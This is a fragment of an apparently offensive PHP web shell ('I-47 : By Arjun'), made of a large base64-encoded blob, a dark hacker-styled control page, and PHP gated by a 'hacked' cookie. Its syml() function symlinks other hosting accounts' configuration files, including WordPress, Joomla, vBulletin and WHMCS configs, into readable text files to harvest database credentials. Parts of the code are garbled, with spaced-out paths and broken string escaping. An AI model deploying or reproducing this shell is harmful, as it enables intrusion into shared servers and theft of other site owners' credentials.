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";
  74 ?>
  75 <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> 
  76 <title>I-47 : By Arjun</title>
  77 <script type="text/javascript">
  78 checked = false;
  79 function checkedAll () 
  80 {
  81     if (checked == false){checked = true}else{checked = false}
  82    for (var i = 0; i < document.getElementById('myform').elements.length; i++) 
  83    {
  84      document.getElementById('myform').elements[i].checked = checked;
  85    }
  86 }
  87 </script>
  88 <style type="text/css">
  89 <!--
  90 
  91 body,td,th {
  92    color: #FF0000;
  93 }
  94 input.but {
  95     background-color:#006633;
  96     color: white;
  97     border : 1px solid #ccc;
  98 }
  99 a:link {
 100    color: #00FF00;
 101    text-decoration:none;
 102    font-weight:600;
 103 }
 104 a:hover {
 105    color:#00FF00;
 106    text-decoration:underline;
 107 }
 108 font.txt
 109 {
 110    color: #00FF00;
 111    text-decoration:none;
 112    font-size:17px;
 113 }
 114 a:visited {
 115    color: #006600;
 116 }
 117 input.box
 118 {
 119     background-color:#0C0C0C;
 120     color: white;
 121     border : 1px solid #ccc;
 122    -moz-border-radius:6px;
 123    width:400;
 124    border-radius:6px;
 125 }
 126 input.sbox
 127 {
 128     background-color:#0C0C0C;
 129     color: white;
 130     border : 1px solid #ccc;
 131    -moz-border-radius:6px;
 132    width:180;
 133    border-radius:6px;
 134 }
 135 select.sbox
 136 {
 137     background-color:#0C0C0C;
 138     color: white;
 139     border : 1px solid #ccc;
 140    -moz-border-radius:6px;
 141    width:180;
 142    border-radius:6px;
 143 }
 144 select.box
 145 {
 146     background-color:#0C0C0C;
 147     color: white;
 148     border : 1px solid #ccc;
 149    -moz-border-radius:6px;
 150    width:400;
 151    border-radius:6px;
 152 }
 153 
 154 textarea.box
 155 {
 156     border : 3px solid #111;
 157     background-color:#161616;
 158     color : white;
 159     margin-top: 10px;
 160    -moz-border-radius:7px;
 161    border-radius:7px;
 162 }
 163 body {
 164    background-color:#000000;
 165 }
 166 -->
 167 </style>
 168 <body>
 169 <?php
 170 if (isset($_COOKIE['hacked']) && $_COOKIE['hacked'] == md5($pass)) {
 171     $self = $_SERVER["PHP_SELF"];
 172     $os = "N/D";
 173     if (stristr(php_uname(), "Windows")) {
 174         $SEPARATOR = '\';
 175           $os = "Windows";
 176           $directorysperator="\";
 177           
 178   }
 179   else if(stristr(php_uname(),"Linux"))
 180   {
 181           $os = "Linux";
 182           $directorysperator=' / ';
 183           
 184   }
 185   function Trail($d,$directsperator)
 186   {
 187       $d=explode($directsperator,$d);
 188       array_pop($d);
 189       array_pop($d);
 190       $str=implode($d,$directsperator);
 191       return $str;
 192   }
 193   
 194   function syml($usern,$pdomain)
 195   {
 196       symlink(' / home / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 197       symlink(' / home / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 198       symlink(' / home / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 199       symlink(' / home / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 200       symlink(' / home / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 201       symlink(' / home / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 202       symlink(' / home / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 203       symlink(' / home / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 204       symlink(' / home / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 205       symlink(' / home / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 206       symlink(' / home / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 207       symlink(' / home / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 208       symlink(' / home / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 209       symlink(' / home / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 210       symlink(' / home / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 211       symlink(' / home / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 212       symlink(' / home / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
